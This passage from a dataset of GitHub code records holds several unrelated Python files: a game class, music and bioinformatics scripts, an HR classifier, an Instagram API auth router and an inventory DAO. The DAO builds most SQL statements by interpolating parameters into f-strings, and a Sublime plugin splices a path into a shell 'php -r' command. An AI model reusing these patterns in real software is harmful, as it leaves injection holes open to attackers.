parts[0]\n total = path + file + '.php'\n print(total)\n config = check_output(['php', '-r', 'echo json_encode(include \"' + total + '\");'])\n config = json.loads(config.decode(\"utf-8\"))\n print(config.keys())\n # self.view.window().open_file(total)", "repo_name": "koerel/sublime-plugins", "sub_path": "laravel-trans-helper.py", "file_name": "laravel-trans-helper.py", "file_ext": "py", "file_size_in_byte": 1195, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sublime_plugin.TextCommand", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "re.search", "line_number": 19, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 27, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "14766366149", "text": "import json\n\nfrom verbs.activities import Activities\n\nfrom counties.county import County\n\n\nclass CountyManager():\n def __init__(self):\n self.counties = {}\n self.selected_county = \"\"\n with open ( \"data/counties.json\" ) as f:\n data = json.load(f)\n for c in data[\"counties\"]:\n county = County()\n county.name = c[\"name\"]\n county.unlock_cost = c[\"unlock_cost\"]\n county.unlocked = c[\"unlocked\"]\n county.wage = c[\"wage\"]\n county.rent = c[\"rent\"]\n county.tithes = c[\"tithes\"]\n county.load_flag(\"images/\" + c[\"flag\"] + \".xp\")\n\n self.counties[county.name] = county\n\n def get_county(self, name):\n if name in self.counties:\n return self.counties[name]\n else:\n return None\n\n def get_selected_county(self):\n return self.get_county(self.selected_county)\n\n def add_activity(self, type):\n self.get_selected_county().add_activity(type)\n\n def remove_activity(self, type):\n return self.get_selected_county().remove_activity(type)\n\n def process_all_activites(self):\n effects = {}\n for county in self.counties.values():\n effects[county.name] = county.process_activities()\n\n return effects\n\n def unlock_selected_county(self):\n self.get_selected_county().unlocked = True\n self.get_selected_county().threat = 0\n\n def enact_policy(self, type):\n self.get_selected_county().enact_policy(type)\n\n \n", "repo_name": "rSherriff/swing", "sub_path": "counties/county_manager.py", "file_name": "county_manager.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "counties.county.County", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "31527559956", "text": "import xml.etree.ElementTree as ET\nimport pandas as pd\nimport time\n\ndef getTracksFromXML(xmlFile):\n \"\"\"XML File => list of XML dicts\"\"\"\n tree = ET.parse(xmlFile)\n root = tree.getroot()\n mainDict = root.findall('dict')\n \n for item in list(mainDict[0]):\n if item.tag=='dict':\n tracksDict = item\n break\n trackList = list(tracksDict.findall('dict'))\n tracksList = []\n for item in trackList:\n tracksList.append(list(item))\n \n return tracksList\n\ndef tracksAsLists(xmlDicts):\n \"\"\"List of XML Dicts => list of XML elements\"\"\"\n tracksList = []\n for item in xmlDicts:\n tracksList.append(list(item))\n return tracksList\n\ndef createDF(xmlFile, cols):\n \"\"\"list of XML elements => Dataframe\"\"\"\n trackDicts = getTracksFromXML(xmlFile)\n trackListXML = 
tracksAsLists(trackDicts)\n\n df = pd.DataFrame(columns = cols)\n dict = {}\n for i in range(len(trackListXML)):\n for j in range(len(trackListXML[i])):\n if trackListXML[i][j].tag == 'key':\n if trackListXML[i][j].text not in cols:\n continue\n dict[trackListXML[i][j].text] = trackListXML[i][j+1].text \n listKeys = [i for i in dict.keys()]\n listVals = [j for j in dict.values()]\n dfTemp = pd.DataFrame([listVals], columns = listKeys)\n df = pd.concat([df, dfTemp], axis = 0, ignore_index = True, sort = True)\n print(f'Track {i+1} of {len(trackListXML)}')\n return df\n\ndef compareWeeklyDFs(dfLastWeek, dfThisWeek):\n \"\"\"df1, df2 => df3\"\"\"\n dfOut = dfThisWeek.copy()\n dfOut['Play Count'] = dfThisWeek['Play Count'].astype(int) - dfLastWeek['Play Count'].astype(int)\n dfOut = dfOut[dfOut['Play Count'] != 0]\n dfOut['Play Count'].fillna(dfThisWeek['Play Count'], inplace = True)\n dfOut['Play Count'] = dfOut['Play Count'].astype(int)\n\n return dfOut\n\n\n\n# The columns I am interested in comparing week-by-week\ncols = ['Track ID', 'Name', 'Artist', 'Album', 'Total Time',\n 'Date Added', 'Play Count']\n\ndf1 = createDF('Library09_21_23.xml', cols)\ndf2 = createDF('Library09_22_23.xml', cols)\ndf3 = compareWeeklyDFs(df1, df2)\ndf3.sort_values(by=['Play Count'], ascending=False, inplace=True)\ndf3.reset_index(inplace = True)\n\nfileTitle = time.strftime('%y_%m_%d')\nfileTitle = fileTitle + 'Listening.csv'\n\ndf3.to_csv(fileTitle)\n", "repo_name": "ecb49/AppleMusicWeekly", "sub_path": "parseLib.py", "file_name": "parseLib.py", "file_ext": "py", "file_size_in_byte": 2388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 7, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 7, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 45, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "42659315265", "text": "#!/usr/bin/env python3\nimport os\nfrom Bio import AlignIO\n\nos.chdir('/Users/kika/programs/tRNAscan-SE_CM_alignments/isotype_specific/Eukaryota/')\nstockholms = [x for x in os.listdir() if x.endswith('.sto')]\n\nfor stockholm in stockholms:\n\tprint(stockholm)\n\tname = stockholm.split('.sto')[0]\n\trecord = AlignIO.parse(stockholm, 'stockholm')\n\twith open('{}.aln'.format(name), 'w') as result:\n\t\tAlignIO.write(record, result, 'fasta')\n", "repo_name": "kikinocka/ngs", "sub_path": "py_scripts/sto_to_fasta.py", "file_name": "sto_to_fasta.py", "file_ext": "py", "file_size_in_byte": 428, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 5, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 6, "usage_type": "call"}, {"api_name": "Bio.AlignIO.parse", "line_number": 11, "usage_type": "call"}, {"api_name": "Bio.AlignIO", "line_number": 11, "usage_type": "name"}, {"api_name": "Bio.AlignIO.write", "line_number": 13, "usage_type": "call"}, {"api_name": "Bio.AlignIO", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "36664634127", "text": "import psycopg2\nimport traceback\nfrom backend.DBManager import DBManager\nfrom backend.EstoqueProduto import EstoqueProduto\n\nclass EstoqueProdutoDAO:\n\n def 
listar_todos(self) -> list:\n        \"returns all estoque_produto rows\"\n\n        estoque_produto_list = []\n        try:\n            connection = DBManager.connect_with_database()\n\n            cursor = connection.cursor()\n            cursor.execute(\"SELECT estoque_id, produto_id, quantidade FROM estoque_produto\")\n\n            rows_in_table = cursor.fetchall()\n            for row in rows_in_table:\n                ep = EstoqueProduto()\n                ep.estoque_id = row[0]\n                ep.produto_id = row[1]\n                ep.quantidade = row[2]\n\n                estoque_produto_list.append(ep)\n\n        except (Exception, psycopg2.Error) as error:\n            traceback.print_exc()\n        finally:\n            if connection:\n                cursor.close()\n                connection.close()\n        return estoque_produto_list\n\n\n    def listar(self, _estoque_id, _produto_id) -> EstoqueProduto:\n        \"returns one estoque_produto row. Params: estoque_id and produto_id\"\n\n        estoque_produto = None\n\n        try:\n            connection = DBManager.connect_with_database()\n\n            cursor = connection.cursor()\n            cursor.execute(f\"SELECT estoque_id, produto_id, quantidade FROM estoque_produto WHERE estoque_id = {_estoque_id } AND produto_id = {_produto_id}\")\n\n            row = cursor.fetchone()\n\n            if row is not None and len(row) > 0:\n                estoque_produto = EstoqueProduto()\n                estoque_produto.estoque_id = row[0]\n                estoque_produto.produto_id = row[1]\n                estoque_produto.quantidade = row[2]\n\n\n        except (Exception, psycopg2.Error) as error:\n            traceback.print_exc()\n        finally:\n            if connection:\n                cursor.close()\n                connection.close()\n        return estoque_produto\n    \n\n    def adicionar(self, _estoque_id, _produto_id, _quantidade) -> bool:\n        \"Adds a new estoque_produto to the database. Params: estoque_id, produto_id and quantidade\"\n\n        success = False\n        try:\n            connection = DBManager.connect_with_database()\n\n            cursor = connection.cursor()\n            cursor.execute(f\"INSERT INTO estoque_produto ( estoque_id, produto_id, quantidade) VALUES ({_estoque_id}, {_produto_id}, {_quantidade})\")\n            \n            connection.commit()\n\n            if cursor.rowcount == 1:\n                success = True\n\n        except (Exception, psycopg2.Error) as error:\n            traceback.print_exc()\n        finally:\n            if connection:\n                cursor.close()\n                connection.close()\n        return success\n    \n\n    def atualizar(self, _estoque_id, _produto_id, _quantidade) -> bool:\n        \"Updates the product quantity of a stock in the database. Params: estoque.id, produto.id and quantidade\"\n\n        success = False\n        try:\n            connection = DBManager.connect_with_database()\n\n            cursor = connection.cursor()\n            cursor.execute(f\"UPDATE estoque_produto SET quantidade = {_quantidade} WHERE estoque_id = {_estoque_id } AND produto_id = {_produto_id}\")\n            connection.commit()\n            if cursor.rowcount == 1:\n                success = True\n        except (Exception, psycopg2.Error) as error:\n            traceback.print_exc()\n        finally:\n            if connection:\n                cursor.close()\n                connection.close()\n        return success\n\n\n    def remover(self, _estoque_id, _produto_id) -> bool:\n        \"Removes a product from a stock. 
params: estoque.id and produto.id\"\n\n        success = False\n        try:\n            connection = DBManager.connect_with_database()\n\n            cursor = connection.cursor()\n            cursor.execute(\"DELETE FROM estoque_produto WHERE estoque_id = %s AND produto_id = %s\", (_estoque_id, _produto_id))\n            connection.commit()\n            if cursor.rowcount == 1:\n                success = True\n        except (Exception, psycopg2.Error) as error:\n            traceback.print_exc()\n        finally:\n            if connection:\n                cursor.close()\n                connection.close()\n        return success", "repo_name": "paulohgs/wofi", "sub_path": "backend/EstoqueProdutoDAO.py", "file_name": "EstoqueProdutoDAO.py", "file_ext": "py", "file_size_in_byte": 4306, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 13, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 13, "usage_type": "name"}, {"api_name": "backend.EstoqueProduto.EstoqueProduto", "line_number": 20, "usage_type": "call"}, {"api_name": "psycopg2.Error", "line_number": 27, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 28, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 42, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 42, "usage_type": "name"}, {"api_name": "backend.EstoqueProduto.EstoqueProduto", "line_number": 50, "usage_type": "call"}, {"api_name": "psycopg2.Error", "line_number": 56, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 57, "usage_type": "call"}, {"api_name": "backend.EstoqueProduto.EstoqueProduto", "line_number": 36, "usage_type": "name"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 70, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 70, "usage_type": "name"}, {"api_name": "psycopg2.Error", "line_number": 80, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 81, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 94, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 94, "usage_type": "name"}, {"api_name": "psycopg2.Error", "line_number": 101, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 102, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager.connect_with_database", "line_number": 115, "usage_type": "call"}, {"api_name": "backend.DBManager.DBManager", "line_number": 115, "usage_type": "name"}, {"api_name": "psycopg2.Error", "line_number": 122, "usage_type": "attribute"}, {"api_name": "traceback.print_exc", "line_number": 123, "usage_type": "call"}]}
{"seq_id": "30190040844", "text": "from __future__ import division\nfrom math import isnan\n\nimport sys\n\n# from django.db import transaction\n\nfrom numpy import dot, zeros\nfrom numpy.linalg import norm\n\nfrom topic_modeling.visualize.models import Dataset, WordType\nfrom topic_modeling.visualize.models import PairwiseDocumentMetric\nfrom topic_modeling.visualize.models import PairwiseDocumentMetricValue\nfrom django.db.models.aggregates import Count\n\nmetric_name = \"Word Correlation\"\n\n# @transaction.commit_manually\ndef add_metric(database_id, dataset, analysis):\n    dataset = Dataset.objects.using(database_id).get(name=dataset)\n    analysis = dataset.analyses.get(name=analysis)\n    metric, created = 
analysis.pairwisedocumentmetrics.get_or_create(name=metric_name, analysis=analysis)\n    if not created:\n        raise RuntimeError(\"%s is already in the database for this analysis\" % metric_name)\n    \n    word_types = WordType.objects.filter(tokens__document__dataset=dataset).distinct()\n    type_idx = dict((word_type.type, i) for i, word_type in enumerate(word_types))  # key by the raw type value so the values('type__type') lookups below match\n    documents = dataset.documents.all()\n\n    docwordvectors = [document_word_vector(type_idx, doc) for doc in documents]\n    vectornorms = [norm(vector) for vector in docwordvectors]\n    \n    for i, doc1 in enumerate(documents):\n        write('.')\n        doc1_word_vals = docwordvectors[i]\n        doc1_norm = vectornorms[i]\n        for j, doc2 in enumerate(documents):\n            doc2_word_vals = docwordvectors[j]\n            doc2_norm = vectornorms[j]\n            correlation_coeff = pmcc(doc1_word_vals, doc2_word_vals, doc1_norm,\n                                     doc2_norm)\n            if not isnan(correlation_coeff):\n                PairwiseDocumentMetricValue.objects.using(database_id).create(\n                    document1=doc1, document2=doc2, metric=metric, value=correlation_coeff)\n        # transaction.commit()\n    write('\\n')\n\ndef write(s):\n    sys.stdout.write(s)\n    sys.stdout.flush()\n\ndef metric_names_generated(_dataset, _analysis):\n    return [metric_name]\n\n\ndef pmcc(doc1_topic_vals, doc2_topic_vals, doc1_norm, doc2_norm):\n    return float(dot(doc1_topic_vals, doc2_topic_vals) /\n                 (doc1_norm * doc2_norm))\n\n\ndef document_word_vector(type_idx, document):\n    document_word_vals = zeros(len(type_idx))\n    for doc_wordtype_count in document.tokens.values('type__type').annotate(count=Count('type__type')):\n        document_word_vals[type_idx[doc_wordtype_count['type__type']]] = doc_wordtype_count['count']\n#    for i, word_type in enumerate(word_types):\n#        document_word_vals[i] = document.tokens.filter(type=word_type).count()\n    \n    return document_word_vals\n", "repo_name": "madisonjbrooks12/topicalguide", "sub_path": "import_tool/metric/document/pairwise/word_correlation.py", "file_name": "word_correlation.py", "file_ext": "py", "file_size_in_byte": 2620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "topic_modeling.visualize.models.Dataset.objects.using", "line_number": 20, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.Dataset.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "topic_modeling.visualize.models.Dataset", "line_number": 20, "usage_type": "name"}, {"api_name": "topic_modeling.visualize.models.WordType.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.WordType.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "topic_modeling.visualize.models.WordType", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 31, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 42, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.PairwiseDocumentMetricValue.objects.using", "line_number": 43, "usage_type": "call"}, {"api_name": "topic_modeling.visualize.models.PairwiseDocumentMetricValue.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "topic_modeling.visualize.models.PairwiseDocumentMetricValue", "line_number": 43, "usage_type": "name"}, {"api_name": "sys.stdout.write", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 50, "usage_type": 
"attribute"}, {"api_name": "numpy.dot", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models.aggregates.Count", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "33809906506", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 20 19:11:04 2020\r\n\r\n@author: Prateek Gupta\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn import linear_model\r\nfrom sklearn.model_selection import GridSearchCV, train_test_split, cross_val_score\r\n\r\ntrain=pd.read_csv(\"train.csv\")\r\ntest=pd.read_csv(\"test.csv\")\r\n\r\ntrain.head(10)\r\ntrain.describe()\r\n\r\n#imputation\r\ntrain['education']=train['education'].fillna(\"Bachelor's\")\r\ntrain['previous_year_rating']=train['previous_year_rating'].fillna(3)\r\n\r\ntrain1=train\r\n\r\n#dummy variables\r\np1=pd.get_dummies(train1[\"department\"]) \r\np2=pd.get_dummies(train1[\"education\"])\r\np3=pd.get_dummies(train1[\"recruitment_channel\"])\r\n\r\nlabelencoder_X = LabelEncoder()\r\ntrain1['gender'] = labelencoder_X.fit_transform(train1['gender'])\r\n\r\ntrain1=pd.concat([train1,p1,p2,p3],axis=1)\r\n\r\n#removing columns\r\ntrain1.drop([\"employee_id\",\"department\",\"region\",\"education\",\"recruitment_channel\",\"region\"], axis=1,inplace =True)\r\n\r\nx=train1\r\nx.drop(\"is_promoted\",axis=1,inplace=True)\r\ny=train[\"is_promoted\"]\r\n\r\n#splitting dataset\r\nx_train, x_val, y_train, y_val = train_test_split(x,y,test_size = 0.20,random_state =205)\r\nsc_X = StandardScaler()\r\nx_train = sc_X.fit_transform(x_train)\r\nx_val = sc_X.transform(x_val)\r\n\r\n#test dataset\r\ntest['education']=test['education'].fillna(\"Bachelor's\")\r\ntest['previous_year_rating']=test['previous_year_rating'].fillna(3)\r\n\r\ntest1=test\r\n\r\n#dummy variables\r\nt1=pd.get_dummies(test1[\"department\"]) \r\nt2=pd.get_dummies(test1[\"education\"])\r\nt3=pd.get_dummies(test1[\"recruitment_channel\"])\r\n\r\n\r\ntest1['gender'] = labelencoder_X.fit_transform(test1['gender'])\r\n\r\ntest1=pd.concat([test1,t1,t2,t3],axis=1)\r\n\r\n\r\n#removing columns\r\ntest1.drop([\"employee_id\",\"department\",\"region\",\"education\",\"recruitment_channel\",\"region\"], axis=1,inplace =True)\r\n\r\ntest1 = sc_X.fit_transform(test1)\r\n\r\n\r\n#implementing classifier models\r\n\r\n#####Logistic regression\r\n################################\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\nclassifier1=LogisticRegression(random_state=0)\r\nclassifier1.fit(x_train,y_train)\r\n\r\npred1=classifier1.predict(x_val)\r\ntrainpred1=classifier1.predict(x_train)\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\ncm1=confusion_matrix(y_val,pred1)\r\nprint(cm1)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred1, average='binary')\r\nf1_score(y_train,trainpred1, average='binary')\r\n\r\n#####Decision Tree Classification\r\n################################\r\n\r\nfrom sklearn.tree import 
DecisionTreeClassifier\r\n\r\nclassifier2=DecisionTreeClassifier(criterion=\"gini\",random_state=0,max_leaf_nodes=100,max_features=15)\r\nclassifier2.fit(x_train,y_train)\r\n\r\npred2=classifier2.predict(x_val)\r\ntrainpred2=classifier2.predict(x_train)\r\n\r\ncm2=confusion_matrix(y_val,pred2)\r\nprint(cm2)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred2, average='binary')\r\nf1_score(y_train,trainpred2, average='binary')\r\n\r\n\r\n#####Random Forest Classification\r\n################################\r\n\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nclassifier3=RandomForestClassifier(n_estimators=1000, criterion='gini', random_state=0, max_depth=100,max_features=22, min_samples_leaf=4, min_samples_split=5,max_leaf_nodes=100)\r\nclassifier3.fit(x_train,y_train)\r\n\r\npred3=classifier3.predict(x_val)\r\ntrainpred3=classifier3.predict(x_train)\r\n\r\ncm3=confusion_matrix(y_val,pred3)\r\nprint(cm3)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred3, average='binary')\r\n#f1 score=\r\nf1_score(y_train,trainpred3, average='binary')\r\n\r\n#####Applying Artificial Neural Network\r\n################################\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\nclassifier4=Sequential()\r\n\r\nclassifier4.add(Dense(units=10, kernel_initializer='uniform', activation='relu', input_dim=19))\r\n\r\nclassifier4.add(Dense(units=10, kernel_initializer='uniform', activation='relu'))\r\n\r\nclassifier4.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\r\n\r\nclassifier4.compile(optimizer=\"adam\",loss=\"binary_crossentropy\",metrics=[\"accuracy\"])\r\n\r\nclassifier4.fit(x_train, y_train, batch_size=10, epochs=100)\r\n\r\npred4=classifier4.predict(x_val)\r\n\r\npred4=(pred4>0.30)\r\n\r\ntrainpred4=classifier4.predict(x_train)\r\ntrainpred4=(trainpred4>0.30)\r\n#confusion matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm4=confusion_matrix(y_val,pred4)\r\nprint(cm4)\r\n\r\nfrom sklearn.metrics import f1_score\r\n\r\nf1_score(y_val,pred4, average='binary')\r\nf1_score(y_train,trainpred4, average='binary')\r\n\r\n#Applying ANN classification on final Test dataset as it gave the best f1 score\r\npred_test=classifier4.predict(test1)\r\npred_test=(pred_test>0.30)\r\nsubmission = pd.DataFrame({'employee_id': test['employee_id'] })\r\nsubmission[\"is_promoted\"]=pred_test.astype(int)\r\nsubmission.to_csv(\"HR_Analytics_submission.csv\",index=False)\r\n\r\n\r\n\r\n", "repo_name": "prateek0894/Data-Science-projects", "sub_path": "HR_Analytics.py", "file_name": "HR_Analytics.py", "file_ext": "py", "file_size_in_byte": 5036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 32, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 35, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.get_dummies", 
"line_number": 60, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 96, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 109, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 115, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 123, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 129, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 136, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 145, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 147, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}]} +{"seq_id": "20846156374", "text": "import json\nfrom typing import Optional, Dict\nfrom fastapi import APIRouter, Depends, Form\nfrom dependencies import ClientStorage, get_clients\n\nrouter = APIRouter(\n prefix=\"/auth\",\n tags=[\"auth\"],\n responses={404: {\"description\": \"Not found\"}}\n)\n\n@router.post(\"/login\")\nasync def auth_login(username: str = Form(...),\n password: str = Form(...),\n verification_code: Optional[str] = Form(\"\"),\n proxy: Optional[str] = Form(\"\"),\n locale: Optional[str] = Form(\"\"),\n timezone: Optional[str] = Form(\"\"),\n clients: ClientStorage = Depends(get_clients)) -> str:\n \"\"\"Login by username and password with 2FA\n \"\"\"\n cl = clients.client()\n if proxy != \"\":\n cl.set_proxy(proxy)\n\n if locale != \"\":\n cl.set_locale(locale)\n\n if timezone != \"\":\n cl.set_timezone_offset(timezone)\n\n result = cl.login(\n username,\n password,\n verification_code=verification_code\n )\n if result:\n clients.set(cl)\n return cl.sessionid\n return result\n\n\n@router.post(\"/relogin\")\nasync def auth_relogin(sessionid: str = Form(...),\n clients: ClientStorage = Depends(get_clients)) -> str:\n \"\"\"Relogin by username and password (with clean cookies)\n \"\"\"\n cl = clients.get(sessionid)\n result = cl.relogin()\n return result\n\n\n@router.get(\"/settings/get\")\nasync def settings_get(sessionid: str,\n clients: ClientStorage = Depends(get_clients)) -> Dict:\n \"\"\"Get client's settings\n \"\"\"\n cl = clients.get(sessionid)\n return 
cl.get_settings()\n\n\n@router.post(\"/settings/set\")\nasync def settings_set(settings: str = Form(...),\n sessionid: Optional[str] = Form(\"\"),\n clients: ClientStorage = Depends(get_clients)) -> str:\n \"\"\"Set client's settings\n \"\"\"\n if sessionid != \"\":\n cl = clients.get(sessionid)\n else:\n cl = clients.client()\n cl.set_settings(json.loads(settings))\n cl.expose()\n clients.set(cl)\n return cl.sessionid\n\n@router.get(\"/timeline_feed\")\nasync def timeline_feed(sessionid: str,\n clients: ClientStorage = Depends(get_clients)) -> Dict:\n \"\"\"Get your timeline feed\n \"\"\"\n cl = clients.get(sessionid)\n return cl.get_timeline_feed()\n", "repo_name": "adw0rd/instagrapi-rest", "sub_path": "routers/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 2377, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 282, "dataset": "github-code", "pt": "52", "api": [{"api_name": "fastapi.APIRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "dependencies.ClientStorage", "line_number": 19, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 13, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 14, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 15, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 16, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 17, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 18, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 19, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 19, "usage_type": "argument"}, {"api_name": "dependencies.ClientStorage", "line_number": 45, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 44, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 45, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 45, "usage_type": "argument"}, {"api_name": "dependencies.ClientStorage", "line_number": 55, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 55, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 55, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 64, "usage_type": "name"}, {"api_name": "dependencies.ClientStorage", "line_number": 65, "usage_type": "name"}, {"api_name": "fastapi.Form", "line_number": 63, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 64, "usage_type": "call"}, {"api_name": "fastapi.Depends", "line_number": 65, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 65, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}, {"api_name": "dependencies.ClientStorage", "line_number": 79, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 79, "usage_type": "call"}, {"api_name": "dependencies.get_clients", "line_number": 79, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "9695240111", "text": "from django.contrib import admin\nfrom accounts.models.user import 
